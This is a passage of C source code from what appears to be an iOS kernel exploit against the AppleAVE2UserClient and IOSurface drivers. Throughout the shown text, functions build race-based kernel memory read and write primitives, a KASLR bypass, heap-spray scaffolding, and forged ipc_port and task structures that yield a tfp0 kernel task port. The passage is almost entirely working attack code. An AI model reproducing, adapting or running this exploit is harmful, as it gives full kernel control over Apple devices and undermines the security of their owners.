0x000000d3U,\n};\n\nextern void print_hexdump(void *buf, size_t len);\nextern void Reply_notify_completion(void);\nextern void Send_overwritting_iosurfaceMap(uint64_t remote_map_addr, uint64_t *local_map_addr);\nextern void Send_notify_msg(void);\nextern bool check_if_its_PAC_device(void);\n\npthread_attr_t pth_commAttr = {0};\nvoid pth_commAttr_init(){\n pthread_attr_init(&pth_commAttr);\n pthread_attr_setdetachstate(&pth_commAttr, PTHREAD_CREATE_DETACHED);\n}\n\nbool check_num_stringlizability_4bytes(uint32_t input_num){\n char *stringlize = (char*)&input_num;\n if(stringlize[0] == '\\0')\n return false;\n if(stringlize[1] == '\\0')\n return false;\n return true;\n}\n\nvoid IOSurfaceRootUserClient_remove_surface_map(io_connect_t ioconn, uint32_t surfaceId){\n // Release the surface\n uint64_t input_sca = surfaceId;\n IOConnectCallScalarMethod(ioconn, 1, &input_sca, 1, NULL, NULL);\n}\n\nuint32_t IOSurfaceRootUserClient_create_surface_map(io_connect_t ioconn, uint64_t *remote_map_addr, uint32_t *remote_map_size){\n \n uint32_t dict_create[] =\n {\n kOSSerializeMagic,\n kOSSerializeEndCollection | kOSSerializeDictionary | 1,\n \n kOSSerializeSymbol | 19,\n 0x75534f49, 0x63616672, 0x6c6c4165, 0x6953636f, 0x657a, // \"IOSurfaceAllocSize\"\n kOSSerializeEndCollection | kOSSerializeNumber | 32,\n 0x4000000, //Need be equal or greater than 0x25BA8 ref: AVE ERROR: IOSurfaceBufferInitInfo->Size() bad\n 0x0,\n };\n \n size_t output_stru_size = 0xDD0; // A fixed size\n char *output_stru = calloc(1, output_stru_size);\n int kr = IOConnectCallStructMethod(ioconn, 0, dict_create, sizeof(dict_create), output_stru, &output_stru_size);\n if(!kr){\n uint64_t ret_addr1 = *(uint64_t*)output_stru;\n //uint64_t ret_addr2 = *(uint64_t*)(output_stru + 8); // Read-only mapping from kernel\n //uint64_t ret_addr3 = *(uint64_t*)(output_stru + 0x10); // Read-only mapping from kernel\n // These are unused values here, you can deleted them.\n \n uint32_t ret_addr1_size = *(uint32_t*)(output_stru + 0x1C); // Must be uint32_t length here\n \n *remote_map_addr = ret_addr1;\n *remote_map_size = ret_addr1_size;\n \n return *(uint32_t*)(output_stru+0x18); //Output: Surface ID\n }\n return 0;\n}\n\n#pragma mark --- TFP0 Kernel Memory R/W Components ---\n\nuint64_t kaslr = 0;\nuint64_t kernel_map_kAddr = 0;\nuint64_t ipc_space_kernel_kAddr = 0;\nuint32_t tfp0_port = 0;\nuint64_t tfp0_portStru = 0;\njmp_buf reattempt_jmpb;\n\nuint32_t new_reading_primitive(uint64_t target_addr);\nuint8_t KernelRead_1byte(uint64_t rAddr){\n if(tfp0_port){\n uint8_t retdata = 0;\n vm_size_t outsize = 0x1;\n vm_read_overwrite(tfp0_port, rAddr, 0x1, (vm_address_t)&retdata, &outsize);\n return retdata;\n }\n return (uint8_t)new_reading_primitive(rAddr);\n}\n\nuint16_t KernelRead_2bytes(uint64_t rAddr){\n if(tfp0_port){\n uint16_t retdata = 0;\n vm_size_t outsize = 0x2;\n vm_read_overwrite(tfp0_port, rAddr, 0x2, (vm_address_t)&retdata, &outsize);\n return retdata;\n }\n return (uint16_t)new_reading_primitive(rAddr);\n}\n\nuint32_t KernelRead_4bytes(uint64_t rAddr){\n if(tfp0_port){\n uint32_t retdata = 0;\n vm_size_t outsize = 0x4;\n vm_read_overwrite(tfp0_port, rAddr, 0x4, (vm_address_t)&retdata, &outsize);\n return retdata;\n }\n return new_reading_primitive(rAddr);\n}\n\nuint64_t KernelRead_8bytes(uint64_t rAddr){\n if(tfp0_port){\n uint64_t retdata = 0;\n vm_size_t outsize = 0x8;\n vm_read_overwrite(tfp0_port, rAddr, 0x8, (vm_address_t)&retdata, &outsize);\n return retdata;\n }\n uint32_t low_32bit = new_reading_primitive(rAddr);\n uint32_t high_32bit = new_reading_primitive(rAddr + 4);\n return (uint64_t)((((uint64_t)high_32bit) << 32) | low_32bit);\n}\n\nvoid KernelRead_anySize(uint64_t rAddr, char *outbuf, size_t outbuf_len){\n if(tfp0_port){\n vm_size_t outsize = outbuf_len;\n vm_read_overwrite(tfp0_port, rAddr, outbuf_len, (vm_address_t)outbuf, &outsize);\n return;\n }\n uint32_t aligned_outbuf_len = (uint32_t)outbuf_len;\n aligned_outbuf_len = (aligned_outbuf_len%4)?(((aligned_outbuf_len/4)+1)*4):aligned_outbuf_len;\n \n for(int i=0; i> 32));\n}\n\nvoid KernelWrite_anySize(uint64_t wAddr, char *inputbuf, uint32_t inputbuf_len){\n if(tfp0_port){\n vm_write(tfp0_port, wAddr, (vm_offset_t)inputbuf, inputbuf_len);\n return;\n }\n for(int i=0; iinputmap_InitInfo_block1[96] != 1 )\n *(uint8_t*)(inputmap_InitInfo + 13477) = 0; // disable kernel_debug\n *(uint64_t*)(inputmap_InitInfo + 5936) = 0;\n \n {\n char *input_stru = calloc(1, 0x28);\n *(uint32_t*)(input_stru + 8) = 0; // offset of inputmap_FrameInfo, godamn, cool feature\n *(uint32_t*)(input_stru + 12) = InitInfo_surfaceId;\n \n size_t output_stru_size = 0x4;\n char *output_stru = calloc(1, output_stru_size);\n IOConnectCallStructMethod(AppleAVE2UserClient_ioconn, 6, input_stru, 0x28, output_stru, &output_stru_size);\n }\n \n user_iosurfaceinfo_buf = *(uint64_t*)(inputmap_InitInfo + 5936);\n \n return user_iosurfaceinfo_buf;\n}\n\nvoid empty_kernel_40_mem(uint64_t target_addr){\n \n *(uint32_t*)(inputmap_InitInfo + 13344) = 1;\n *(uint32_t*)(inputmap_InitInfo + 13368) = 1;\n *(uint32_t*)(inputmap_InitInfo + 2020) = 160;\n *(uint32_t*)(inputmap_InitInfo + 2024) = 64;\n \n *(uint32_t*)(inputmap_InitInfo + 0x10) = 0x4569;\n *(uint32_t*)(inputmap_InitInfo + 12) = 5;\n \n *(uint32_t*)(inputmap_InitInfo + 96) = 1;\n *(uint8_t*)(inputmap_InitInfo + 13477) = 0; // disable kernel_debug\n *(uint64_t*)(inputmap_InitInfo + 5936) = target_addr;\n \n {\n char *input_stru = calloc(1, 0x28);\n *(uint32_t*)(input_stru + 8) = 0;\n *(uint32_t*)(input_stru + 12) = InitInfo_surfaceId;\n \n size_t output_stru_size = 0x4;\n char *output_stru = calloc(1, output_stru_size);\n IOConnectCallStructMethod(AppleAVE2UserClient_ioconn, 6, input_stru, 0x28, output_stru, &output_stru_size);\n }\n}\n\nuint64_t alloc_kernel_40_mem_contains_iosurfacebuf(){\n \n uint64_t user_iosurfaceinfo_buf;\n \n *(uint32_t*)(inputmap_InitInfo + 13344) = 1;\n *(uint32_t*)(inputmap_InitInfo + 13368) = 1;\n \n *(uint32_t*)(inputmap_InitInfo + 0x10) = 0x4569;\n *(uint32_t*)(inputmap_InitInfo + 12) = 0;\n \n *(uint32_t*)(inputmap_InitInfo + 96) = 1;\n *(uint8_t*)(inputmap_InitInfo + 13477) = 0;\n \n *(uint32_t*)(inputmap_InitInfo + 4) = 0x333;\n \n {\n char *input_stru = calloc(1, 0x28);\n *(uint32_t*)(input_stru + 8) = 0;\n *(uint32_t*)(input_stru + 12) = InitInfo_surfaceId;\n \n size_t output_stru_size = 0x4;\n char *output_stru = calloc(1, output_stru_size);\n IOConnectCallStructMethod(AppleAVE2UserClient_ioconn, 6, input_stru, 0x28, output_stru, &output_stru_size);\n }\n \n *(uint32_t*)(inputmap_InitInfo + 4) = 0x1; // this effect 40_mem_destroy, so must set back\n \n user_iosurfaceinfo_buf = *(uint64_t*)(inputmap_InitInfo + 5936);\n \n return user_iosurfaceinfo_buf;\n}\n\nvoid release_kernel_40_mem(uint64_t user_iosurfaceinfo_buf){\n \n *(uint32_t*)(inputmap_InitInfo + 4) = 0;\n *(uint32_t*)(inputmap_InitInfo + 13344) = 1;\n *(uint32_t*)(inputmap_InitInfo + 13368) = 1;\n \n *(uint32_t*)(inputmap_InitInfo + 0x10) = 0x4569;\n *(uint32_t*)(inputmap_InitInfo + 12) = 0;\n \n *(uint32_t*)(inputmap_InitInfo + 96) = 1;\n *(uint8_t*)(inputmap_InitInfo + 13477) = 0;\n *(uint64_t*)(inputmap_InitInfo + 5936) = user_iosurfaceinfo_buf;\n \n char *input_stru = calloc(1, 0x28);\n *(uint32_t*)(input_stru + 8) = 0;\n *(uint32_t*)(input_stru + 12) = InitInfo_surfaceId;\n \n size_t output_stru_size = 0x4;\n char *output_stru = calloc(1, output_stru_size);\n \n IOConnectCallStructMethod(AppleAVE2UserClient_ioconn, 6, input_stru, 0x28, output_stru, &output_stru_size);\n \n if(*(uint64_t*)(inputmap_InitInfo + 5936)){\n (printf)(\"release_kernel_40_mem failure detected....reattemping\\n\");\n longjmp(reattempt_jmpb, 1);\n }\n}\n\nvoid IOSurfaceRootUserClient_sRemoveValue(uint32_t spray_id, uint32_t key){\n \n uint32_t input_stru[3] = {0};\n input_stru[0] = spray_id;\n input_stru[1] = 0;\n input_stru[2] = key;\n \n size_t output_stru_size = 4;\n uint32_t output_stru = 0;\n \n IOConnectCallStructMethod(IOSurfaceRootUserClient_ioconn, 11, input_stru, sizeof(input_stru), &output_stru, &output_stru_size);\n}\n\nchar *www_output_stru = NULL;\nchar *IOSurfaceRootUserClient_sCopyValue(uint32_t spray_id, uint32_t lookup_key){\n \n uint32_t input_stru[3] = {0};\n input_stru[0] = spray_id;\n input_stru[1] = 0;\n input_stru[2] = lookup_key;\n \n size_t output_stru_size = 5000;\n if(!www_output_stru)\n www_output_stru = malloc(output_stru_size);\n bzero(www_output_stru, output_stru_size);\n \n int kr = IOConnectCallStructMethod(IOSurfaceRootUserClient_ioconn, 10, input_stru, sizeof(input_stru), www_output_stru, &output_stru_size);\n if(kr){\n printf(\"lookup_key: 0x%x IOSurfaceRootUserClient_sCopyValue failure: 0x%x\\n\", lookup_key, kr);\n return NULL;\n }\n \n return www_output_stru;\n}\n\nuint64_t magic_addr = 0;\n\nuint64_t _temp_kernel_reading_mapOffset = 0x30000;\nuint8_t _temp_kernel_reading_semaphore = 0;\nuint64_t _temp_kernel_reading_target_addr = 0;\n\nvoid _temp_kernel_reading_threadFunc(){\n \n uint64_t precalc_value1 = magic_addr + _temp_kernel_reading_mapOffset; // input_shit\n uint64_t precalc_value2 = _temp_kernel_reading_target_addr - 64;\n uint64_t backup_iosurfacebuf = 0;\n \n uint64_t *alert1 = (uint64_t*)(inputmap_InitInfo + 1096);\n uint64_t *alert2 = (uint64_t*)(inputmap_InitInfo + _temp_kernel_reading_mapOffset); // input_shit->ptr\n uint64_t *alert3 = (uint64_t*)(inputmap_InitInfo + 56);\n \n _temp_kernel_reading_semaphore = 1; // Ready\n \n while(!*alert1){if(!_temp_kernel_reading_semaphore) return;}\n *(uint64_t*)(inputmap_InitInfo + 5936) = precalc_value1;\n \n while(!*alert2){if(!_temp_kernel_reading_semaphore) return;}\n backup_iosurfacebuf = *alert2;\n *alert2 = precalc_value2;\n *(uint64_t*)(inputmap_InitInfo + 5936) = 0;\n \n while(!*alert3){if(!_temp_kernel_reading_semaphore) return;}\n *alert2 = 0;//backup_iosurfacebuf;\n *(uint64_t*)(inputmap_InitInfo + 5936) = 0;\n}\n\nuint64_t temp_kernel_reading(uint64_t target_addr){\n \n int kr = 0;\n uint64_t retdata = 0;\n do{\n *(uint64_t*)(inputmap_InitInfo + 56) = 0;\n *(uint64_t*)(inputmap_InitInfo + 1096) = 0;\n *(uint64_t*)(inputmap_InitInfo + 5936) = 0;\n \n *(uint64_t*)(inputmap_InitInfo + _temp_kernel_reading_mapOffset) = 0; // input_shit\n \n _temp_kernel_reading_target_addr = target_addr;\n _temp_kernel_reading_semaphore = 0;\n pthread_t ph = NULL;\n pthread_create(&ph, NULL, (void*)_temp_kernel_reading_threadFunc, NULL);\n while(!_temp_kernel_reading_semaphore){};\n \n *(uint32_t*)(inputmap_InitInfo + 0x10) = 0x4569; // InfoType\n *(uint32_t*)(inputmap_InitInfo + 12) = 0; // To cause AVE ERROR: multiPassEndPassCounterWFR *Can use for early return\n // or cause unmap later in IMG_V_EncodeAndSendFrame\n \n *(uint32_t*)(inputmap_InitInfo + 96) = 1; // Skip code at: if ( *(_DWORD *)&clientbuf->inputmap_InitInfo_block1[96] != 1 )\n *(uint8_t*)(inputmap_InitInfo + 13477) = 0; // disable kernel_debug\n *(uint64_t*)(inputmap_InitInfo + 5936) = magic_addr + 0x30000 - 0x28; // point to a unused addr\n {\n char input_stru[0x28] = {0};\n *(uint32_t*)(input_stru + 8) = 0;\n *(uint32_t*)(input_stru + 12) = InitInfo_surfaceId;\n \n size_t output_stru_size = 0x4;\n uint32_t output_stru = 0;\n IOConnectCallStructMethod(AppleAVE2UserClient_ioconn, 6, input_stru, 0x28, &output_stru, &output_stru_size);\n }\n _temp_kernel_reading_semaphore = 0;\n pthread_join(ph, NULL);\n \n \n uint64_t *alert3 = (uint64_t*)(inputmap_InitInfo + _temp_kernel_reading_mapOffset + 0x10);\n if(*alert3){\n (printf)(\"alert3: 0x%llx\\n\", *alert3);\n retdata = *alert3;\n //break;\n }\n \n _temp_kernel_reading_mapOffset = _temp_kernel_reading_mapOffset + 0x8;\n *(uint64_t*)(inputmap_InitInfo + 5936) = 0;\n //retdata = *(uint64_t*)(inputmap_InitInfo + 56);\n \n }while(!retdata || kr);\n \n \n return retdata;\n}\n\nvoid _temp_kernel_reading_categ3_threadFunc(){\n \n uint64_t precalc_value1 = magic_addr + _temp_kernel_reading_mapOffset; // input_shit\n uint64_t precalc_value2 = _temp_kernel_reading_target_addr - 64;\n uint64_t backup_iosurfacebuf = 0;\n \n uint64_t *alert1 = (uint64_t*)(inputmap_InitInfo + 1096);\n uint64_t *alert2 = (uint64_t*)(inputmap_InitInfo + _temp_kernel_reading_mapOffset); // input_shit->ptr\n uint64_t *alert3 = (uint64_t*)(inputmap_InitInfo + 56);\n \n _temp_kernel_reading_semaphore = 1; // Ready\n \n while(!*alert1){if(!_temp_kernel_reading_semaphore) return;}\n *(uint64_t*)(inputmap_InitInfo + 5936) = precalc_value1;\n \n while(!*alert2){if(!_temp_kernel_reading_semaphore) return;}\n backup_iosurfacebuf = *alert2;\n *alert2 = precalc_value2;\n *(uint64_t*)(inputmap_InitInfo + 5936) = 0;\n \n while(!*alert3){if(!_temp_kernel_reading_semaphore) return;}\n *alert2 = 0;//backup_iosurfacebuf;\n *(uint64_t*)(inputmap_InitInfo + 5936) = 0;\n}\n\nuint32_t temp_kernel_reading_categ3(uint64_t target_addr){\n \n int kr = 0;\n uint32_t retdata = 0;\n do{\n //*(uint32_t*)(inputmap_InitInfo + 4) = 99;\n *(uint64_t*)(inputmap_InitInfo + 56) = 0;\n *(uint64_t*)(inputmap_InitInfo + 1096) = 0;\n *(uint64_t*)(inputmap_InitInfo + 5936) = 0;\n \n *(uint64_t*)(inputmap_InitInfo + _temp_kernel_reading_mapOffset) = 0; // input_shit\n \n _temp_kernel_reading_target_addr = target_addr;\n _temp_kernel_reading_semaphore = 0;\n pthread_t ph = NULL;\n pthread_create(&ph, NULL, (void*)_temp_kernel_reading_categ3_threadFunc, NULL);\n while(!_temp_kernel_reading_semaphore){};\n \n *(uint32_t*)(inputmap_InitInfo + 0x10) = 0x4569; // InfoType\n *(uint32_t*)(inputmap_InitInfo + 12) = 0; // To cause AVE ERROR: multiPassEndPassCounterWFR *Can use for early return\n // or cause unmap later in IMG_V_EncodeAndSendFrame\n \n *(uint32_t*)(inputmap_InitInfo + 96) = 1; // Skip code at: if ( *(_DWORD *)&clientbuf->inputmap_InitInfo_block1[96] != 1 )\n *(uint8_t*)(inputmap_InitInfo + 13477) = 0; // disable kernel_debug\n *(uint64_t*)(inputmap_InitInfo + 5936) = magic_addr + 0x30000 - 0x28; // point to a unused addr\n {\n char input_stru[0x28] = {0};\n *(uint32_t*)(input_stru + 8) = 0;\n *(uint32_t*)(input_stru + 12) = InitInfo_surfaceId;\n \n size_t output_stru_size = 0x4;\n uint32_t output_stru = 0;\n IOConnectCallStructMethod(AppleAVE2UserClient_ioconn, 6, input_stru, 0x28, &output_stru, &output_stru_size);\n }\n _temp_kernel_reading_semaphore = 0;\n pthread_join(ph, NULL);\n \n \n uint32_t *alert3 = (uint32_t*)(inputmap_InitInfo + _temp_kernel_reading_mapOffset + 16);\n if(*alert3){\n //(printf)(\"temp_kernel_reading_bypass_kaslr: 0x%x\\n\", *alert3);\n retdata = *alert3;\n //break;\n }\n \n _temp_kernel_reading_mapOffset = _temp_kernel_reading_mapOffset + 16;\n *(uint64_t*)(inputmap_InitInfo + 5936) = 0;\n //retdata = *(uint64_t*)(inputmap_InitInfo + 56);\n \n }while(!retdata || kr);\n \n //complete_frame(0); // mmm\n return retdata;\n}\n\nvoid _temp_kernel_reading_bypass_kaslr_threadFunc(){\n \n uint64_t precalc_value1 = magic_addr + _temp_kernel_reading_mapOffset; // input_shit\n uint64_t precalc_value2 = _temp_kernel_reading_target_addr - 24;\n uint64_t backup_iosurfacebuf = 0;\n \n uint64_t *alert1 = (uint64_t*)(inputmap_InitInfo + 1096);\n uint64_t *alert2 = (uint64_t*)(inputmap_InitInfo + _temp_kernel_reading_mapOffset); // input_shit->ptr\n uint64_t *alert3 = (uint64_t*)(inputmap_InitInfo + 56);\n \n _temp_kernel_reading_semaphore = 1; // Ready\n \n while(!*alert1){if(!_temp_kernel_reading_semaphore) return;}\n *(uint64_t*)(inputmap_InitInfo + 5936) = precalc_value1;\n \n while(!*alert2){if(!_temp_kernel_reading_semaphore) return;}\n backup_iosurfacebuf = *alert2;\n *alert2 = precalc_value2;\n *(uint64_t*)(inputmap_InitInfo + 5936) = 0;\n \n while(!*alert3){if(!_temp_kernel_reading_semaphore) return;}\n *alert2 = 0;//backup_iosurfacebuf;\n *(uint64_t*)(inputmap_InitInfo + 5936) = 0;\n}\n\nuint32_t temp_kernel_reading_categ5(uint64_t target_addr){\n \n int kr = 0;\n uint32_t retdata = 0;\n do{\n //*(uint32_t*)(inputmap_InitInfo + 4) = 99;\n *(uint64_t*)(inputmap_InitInfo + 56) = 0;\n *(uint64_t*)(inputmap_InitInfo + 1096) = 0;\n *(uint64_t*)(inputmap_InitInfo + 5936) = 0;\n \n *(uint64_t*)(inputmap_InitInfo + _temp_kernel_reading_mapOffset) = 0; // input_shit\n \n _temp_kernel_reading_target_addr = target_addr;\n _temp_kernel_reading_semaphore = 0;\n pthread_t ph = NULL;\n pthread_create(&ph, NULL, (void*)_temp_kernel_reading_bypass_kaslr_threadFunc, NULL);\n while(!_temp_kernel_reading_semaphore){};\n \n *(uint32_t*)(inputmap_InitInfo + 0x10) = 0x4569; // InfoType\n *(uint32_t*)(inputmap_InitInfo + 12) = 0; // To cause AVE ERROR: multiPassEndPassCounterWFR *Can use for early return\n // or cause unmap later in IMG_V_EncodeAndSendFrame\n \n *(uint32_t*)(inputmap_InitInfo + 96) = 1; // Skip code at: if ( *(_DWORD *)&clientbuf->inputmap_InitInfo_block1[96] != 1 )\n *(uint8_t*)(inputmap_InitInfo + 13477) = 0; // disable kernel_debug\n *(uint64_t*)(inputmap_InitInfo + 5936) = magic_addr + 0x30000 - 0x28; // point to a unused addr\n {\n char input_stru[0x28] = {0};\n *(uint32_t*)(input_stru + 8) = 0;\n *(uint32_t*)(input_stru + 12) = InitInfo_surfaceId;\n \n size_t output_stru_size = 0x4;\n uint32_t output_stru = 0;\n IOConnectCallStructMethod(AppleAVE2UserClient_ioconn, 6, input_stru, 0x28, &output_stru, &output_stru_size);\n }\n _temp_kernel_reading_semaphore = 0;\n pthread_join(ph, NULL);\n \n \n uint32_t *alert3 = (uint32_t*)(inputmap_InitInfo + _temp_kernel_reading_mapOffset + 32);\n if(*alert3){\n //(printf)(\"temp_kernel_reading_bypass_kaslr: 0x%x\\n\", *alert3);\n retdata = *alert3;\n }\n \n _temp_kernel_reading_mapOffset = _temp_kernel_reading_mapOffset + 0x8;\n *(uint64_t*)(inputmap_InitInfo + 5936) = 0;\n \n }while(!retdata || kr);\n \n return retdata;\n}\n\nvoid temp_kernel_reading_insert_valid_kaddr(uint64_t target_addr){\n \n *(uint64_t*)(inputmap_InitInfo + 56) = 0;\n *(uint64_t*)(inputmap_InitInfo + 1096) = 0;\n *(uint64_t*)(inputmap_InitInfo + 5936) = 0;\n \n *(uint32_t*)(inputmap_InitInfo + 0x10) = 0x4569; // InfoType\n *(uint32_t*)(inputmap_InitInfo + 12) = 0;\n *(uint32_t*)(inputmap_InitInfo + 96) = 1;\n *(uint8_t*)(inputmap_InitInfo + 13477) = 0;\n *(uint64_t*)(inputmap_InitInfo + 5936) = target_addr;\n {\n char input_stru[0x28] = {0};\n *(uint32_t*)(input_stru + 8) = 0;\n *(uint32_t*)(input_stru + 12) = InitInfo_surfaceId;\n \n size_t output_stru_size = 0x4;\n uint32_t output_stru = 0;\n IOConnectCallStructMethod(AppleAVE2UserClient_ioconn, 6, input_stru, 0x28, &output_stru, &output_stru_size);\n }\n \n *(uint64_t*)(inputmap_InitInfo + 5936) = 0;\n}\n\nvoid _temp_kernel_reading_release_mem_threadFunc(){\n \n uint64_t precalc_value1 = magic_addr + _temp_kernel_reading_mapOffset; // input_shit\n uint64_t precalc_value2 = _temp_kernel_reading_target_addr;\n \n uint64_t *alert1 = (uint64_t*)(inputmap_InitInfo + 1096);\n uint64_t *alert2 = (uint64_t*)(inputmap_InitInfo + _temp_kernel_reading_mapOffset); // input_shit->ptr\n uint64_t *alert3 = (uint64_t*)(inputmap_InitInfo + _temp_kernel_reading_mapOffset + 8);\n \n _temp_kernel_reading_semaphore = 1; // Ready\n \n while(!*alert1){if(!_temp_kernel_reading_semaphore) return;}\n *(uint64_t*)(inputmap_InitInfo + 5936) = precalc_value1;\n \n while(!*alert2){if(!_temp_kernel_reading_semaphore) return;}\n //backup_iosurfacebuf = *alert2;\n *alert2 = precalc_value2;\n *(uint64_t*)(inputmap_InitInfo + 5936) = 0;\n \n while(!*alert3){if(!_temp_kernel_reading_semaphore) return;}\n uint64_t verify_v = *alert3;\n (printf)(\"verify_v: 0x%llx\\n\", verify_v);\n}\n\nuint32_t temp_kernel_reading_release_mem(uint64_t target_addr){\n \n uint32_t retdata = 0;\n do{\n *(uint64_t*)(inputmap_InitInfo + 56) = 0;\n *(uint64_t*)(inputmap_InitInfo + 1096) = 0;\n *(uint64_t*)(inputmap_InitInfo + 5936) = 0;\n \n *(uint64_t*)(inputmap_InitInfo + _temp_kernel_reading_mapOffset) = 0; // input_shit\n \n _temp_kernel_reading_target_addr = target_addr;\n _temp_kernel_reading_semaphore = 0;\n pthread_t ph = NULL;\n pthread_create(&ph, NULL, (void*)_temp_kernel_reading_release_mem_threadFunc, NULL);\n while(!_temp_kernel_reading_semaphore){};\n \n *(uint32_t*)(inputmap_InitInfo + 0x10) = 0x4569; // InfoType\n *(uint32_t*)(inputmap_InitInfo + 12) = 0; // To cause AVE ERROR: multiPassEndPassCounterWFR *Can use for early return\n // or cause unmap later in IMG_V_EncodeAndSendFrame\n \n *(uint32_t*)(inputmap_InitInfo + 96) = 1; // Skip code at: if ( *(_DWORD *)&clientbuf->inputmap_InitInfo_block1[96] != 1 )\n *(uint8_t*)(inputmap_InitInfo + 13477) = 0; // disable kernel_debug\n *(uint64_t*)(inputmap_InitInfo + 5936) = magic_addr + 0x30000 - 0x28; // point to a unused addr\n {\n char input_stru[0x28] = {0};\n *(uint32_t*)(input_stru + 8) = 0;\n *(uint32_t*)(input_stru + 12) = InitInfo_surfaceId;\n \n size_t output_stru_size = 0x4;\n uint32_t output_stru = 0;\n IOConnectCallStructMethod(AppleAVE2UserClient_ioconn, 6, input_stru, 0x28, &output_stru, &output_stru_size);\n }\n _temp_kernel_reading_semaphore = 0;\n pthread_join(ph, NULL);\n \n \n uint32_t *check_if_mem_been_released = (uint32_t*)(inputmap_InitInfo + _temp_kernel_reading_mapOffset + 24);\n if(*check_if_mem_been_released == 0){\n break;\n }\n \n }while(1);\n \n return retdata;\n}\n\nvoid prep_new_reading_primi(){\n // Have to call this everytime in prior to read\n \n char *forge_clientbuf = inputmap_InitInfo + 0x24000;\n uint64_t forge_clientbuf_kaddr = magic_addr + 0x24000;\n \n char *forge_KernelFrameQueue = forge_clientbuf + 0x29B98;\n uint64_t forge_KernelFrameQueue_kaddr = forge_clientbuf_kaddr + 0x29B98;\n \n char *forge_inputmap_FrameInfo = forge_KernelFrameQueue + 24;\n uint64_t forge_inputmap_FrameInfo_kaddr = forge_KernelFrameQueue_kaddr + 24;\n \n *(uint64_t*)(forge_KernelFrameQueue + 0x10) = forge_inputmap_FrameInfo_kaddr;\n \n *(uint32_t*)(forge_clientbuf + 0x8) = 0x0;\n *(forge_clientbuf + 0x27B59) = 0x0;\n \n \n *(uint64_t*)(forge_inputmap_FrameInfo + 16) = 0x4569;\n *(uint32_t*)(forge_clientbuf + 0x4FF0 + 112) = 0x1;\n \n *(uint64_t*)(forge_clientbuf + 0x27838) = forge_inputmap_FrameInfo_kaddr + 0x2A000;\n \n *(uint64_t*)(forge_inputmap_FrameInfo + 5936) = 0;\n}\n\nuint32_t new_reading_primitive(uint64_t target_addr){\n \n prep_new_reading_primi();\n \n char *forge_inputmap_FrameInfo = inputmap_InitInfo + 0x24000 + 0x29B98 + 24;\n uint64_t forge_inputmap_FrameInfo_kaddr = magic_addr + 0x24000 + 0x29B98 + 24;\n \n *(uint32_t*)(forge_inputmap_FrameInfo + 20) = 0x2;\n \n uint32_t *retdata = (uint32_t*)(forge_inputmap_FrameInfo + 176);\n *retdata = 0;\n \n char *m_DPB = forge_inputmap_FrameInfo + 0x2A000;\n uint64_t m_DPB_inKernel = forge_inputmap_FrameInfo_kaddr + 0x2A000;\n \n *(uint32_t*)(m_DPB + 20) = 1;\n *(uint32_t*)(m_DPB + 2364) = 0;\n \n char *v8 = m_DPB + 96*(0) + 728;\n uint64_t v8_inKernel = m_DPB_inKernel + 96*(0) + 728;\n \n *(uint64_t*)(v8 + 72) = v8_inKernel + 40;\n *(uint64_t*)(v8 + 80) = 0;\n *(uint64_t*)(v8 + 40) = v8_inKernel + 48 - 32;\n *(uint64_t*)(v8 + 48) = target_addr - 12;\n \n *(uint64_t*)(v8) = 0;\n \n *(uint32_t*)(forge_inputmap_FrameInfo + 0x10) = 0x4569;\n *(uint32_t*)(forge_inputmap_FrameInfo + 12) = 0;\n \n *(uint32_t*)(forge_inputmap_FrameInfo + 96) = 2;\n *(uint8_t*)(forge_inputmap_FrameInfo + 13477) = 0;\n *(uint64_t*)(forge_inputmap_FrameInfo + 5936) = 0;\n {\n char input_stru[0x28] = {0};\n *(uint32_t*)(input_stru + 8) = 0;\n *(uint32_t*)(input_stru + 12) = InitInfo_surfaceId;\n \n size_t output_stru_size = 0x4;\n uint32_t output_stru = 0;\n IOConnectCallStructMethod(AppleAVE2UserClient_ioconn, 6, input_stru, 0x28, &output_stru, &output_stru_size);\n }\n \n return *retdata;\n}\n\nvoid new_writing_primi(uint64_t target_addr, uint32_t write_data){\n \n char *forge_clientbuf = inputmap_InitInfo + 0x24000; // 放在 magic mem + 0x24000的位置\n \n char *forge_KernelFrameQueue = forge_clientbuf + 0x29B98;\n \n //KernelFrameQueue->m_BaseAddress; // in this write prim, m_BaseAddress is the target addr we want it to be overwritten\n *(uint64_t*)(forge_KernelFrameQueue + 0x10) = target_addr - 5948;\n \n // clientbuf->UniqueClientID // in this write prim, UniqueClientID is the data we will use it to overwrite\n *(uint32_t*)(forge_clientbuf + 0x8) = write_data;\n \n {\n char *input_stru = calloc(1, 0x28);\n *(uint32_t*)(input_stru + 8) = 0; // offset of inputmap_FrameInfo, godamn, cool feature\n *(uint32_t*)(input_stru + 12) = InitInfo_surfaceId;\n \n size_t output_stru_size = 0x4;\n char *output_stru = calloc(1, output_stru_size);\n IOConnectCallStructMethod(AppleAVE2UserClient_ioconn, 6, input_stru, 0x28, output_stru, &output_stru_size);\n }\n}\n\nvoid build_fake_task_stru_forReadMem(char *faketask, uint64_t target_addr){\n \n *(uint32_t*)(faketask + 0x10) = 99; // ref_cnt\n \n // offset 0x368: mach task->bsd_info\n \n *(uint64_t*)(faketask + 0x368) = target_addr - 0x60;\n}\n\nvoid build_fake_ipc_port_stru(struct ipc_port *fakeport, uint64_t specify_kobject){\n \n struct ipc_port *_tmp = malloc(sizeof(struct ipc_port));\n bzero(_tmp, sizeof(struct ipc_port));\n \n _tmp->ip_bits = IO_BITS_ACTIVE | IKOT_TASK | IO_BITS_KOBJECT;\n _tmp->ip_references = 100;\n _tmp->ip_lock.type = 0x11;\n _tmp->ip_messages.port.receiver_name = 1;\n _tmp->ip_messages.port.msgcount = 0;\n _tmp->ip_messages.port.qlimit = MACH_PORT_QLIMIT_KERNEL;\n \n _tmp->ip_kobject = specify_kobject;\n _tmp->ip_receiver = ipc_space_kernel_kAddr;\n \n KernelWrite_anySize(fakeport, _tmp, sizeof(struct ipc_port));\n \n}\n\nvoid build_fake_task_stru_forTFP0(struct task *faketask){\n \n //KernelRead_anySize(p_ucred_obtain_rootAndUnsandbox, old_cred, 0x68);\n struct task *_tmp = malloc(sizeof(struct task));\n bzero(_tmp, sizeof(struct task));\n \n _tmp->ref_count = 99;\n _tmp->lock.data = 0x0;\n _tmp->lock.type = 0x22;\n _tmp->active = 1;\n _tmp->pad2 = 1; // Something intro since iOS13, must not be 0, same offsets on iPhoneX and XS\n _tmp->map = kernel_map_kAddr;\n \n KernelWrite_anySize(faketask, _tmp, sizeof(struct task));\n}\n\nsize_t TT1_seria_data_totalLen = 0;\nuint32_t *TT1_seria_data_head = NULL;\nuint64_t *TT1_spraydata = NULL;\nuint32_t *TT1_seria_data_tail = NULL;\n\n#define TT1_holes_count 20\n\nvoid Init_spraydata_for_TT1(uint32_t 